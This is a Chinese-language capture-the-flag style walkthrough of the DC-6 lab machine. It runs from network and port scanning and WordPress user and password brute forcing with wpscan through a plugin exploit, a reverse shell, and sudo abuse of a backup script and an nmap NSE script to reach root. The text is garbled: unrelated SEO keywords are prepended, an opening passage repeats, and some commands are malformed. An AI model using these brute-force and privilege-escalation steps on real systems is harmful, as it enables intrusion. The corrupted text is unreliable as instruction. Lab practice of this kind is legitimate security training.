中山cms建站,asp网站建设公司,职业生涯规划大赛优秀作品,滨江专业网页制作哪家好先去看看DC-6的官网描述#xff0c;看看有没有给出提示信息 把这个线索信息先复制下来
cat /usr/share/wordlists/rockyou.txt | grep k01 passwords.txt开始前先要吧 kali和DC-6靶机放在统一网段#xff0c;都换成NAT模式
然后看一下DC-6的MAC地址
靶机的MAC地址00… 先去看看DC-6的官网描述看看有没有给出提示信息 把这个线索信息先复制下来
cat /usr/share/wordlists/rockyou.txt | grep k01 passwords.txt开始前先要吧 kali和DC-6靶机放在统一网段都换成NAT模式
然后看一下DC-6的MAC地址
靶机的MAC地址00:0C:29:FA:57:22信息收集
主机扫描
netdiscover -r 192.168.80.0/24端口扫描
nmap -A -T4 -p- 192.168.80.140发现靶机开起来80端口和22端口
根据DC-6靶场的文档描述需要修改hosts文件
vim /etc/hosts #靶机的地址和域名映射通过kali自带的浏览器访问靶机的80的端口 发现是WordPress的站点这跟DC-2的是一样的站点那就可以跟DC-2一样用wpscan来扫描这个站点的漏洞
先爆破一下目录看看
dirsearch -u 192.168.80.140 -i 200使用御剑爆破一下 进入登录页面现在还不知道密码和账户 漏洞利用
使用wpscan进行枚举爆破用户名
wpscan --url http://wordy/ -e u # 枚举 WordPress 站点中注册过的用户名来制作用户名字典。把账户写进/tmp/user.txt文件里
现在有了账户还没密码需要用靶场文档描述里说的线索提示
cat /usr/share/wordlists/rockyou.txt | grep k01 passwords.txt报错说没有目录可以使用cd命令过去看一看 gunzip rockyou.txt.gz现在有了用户字典有了密码字典继续使用wpscan密码爆破
注意是在/tmp目录下进行爆破
wpscan --url http://wordy/ -U user.txt -P passwords.txt # 调用相关的字典文件对网站进行爆破。爆破完用mark helpdesk01做登录 搜索Activity monitor这个插件有没有漏洞 找一下漏洞的绝对路径 用python执行这个脚本 提权
新建一个终端监听8989 然后在刚才的终端里输入反弹shell 已经监听到了 使用python交互shell
python -c import pty;pty.spawn(/bin/bash)在mark的家目录里发现有用的信息 查看su graham切换用户发现可以使用su这个命令 使用sudo -l查看能使用哪些root权限的命令 切换到jens的家目录看一下 可以往里面追加/bin/bash 使用sudo -u jens ./backups.sh
-u 指定用户
切换到了jens用户 继续使用sudo -l 查看 echo os.execute(/bin/bash) shell.nsesudo -u root nmap --scriptshell.nse
#以root用户执行namp脚本进入/root下查看有无文件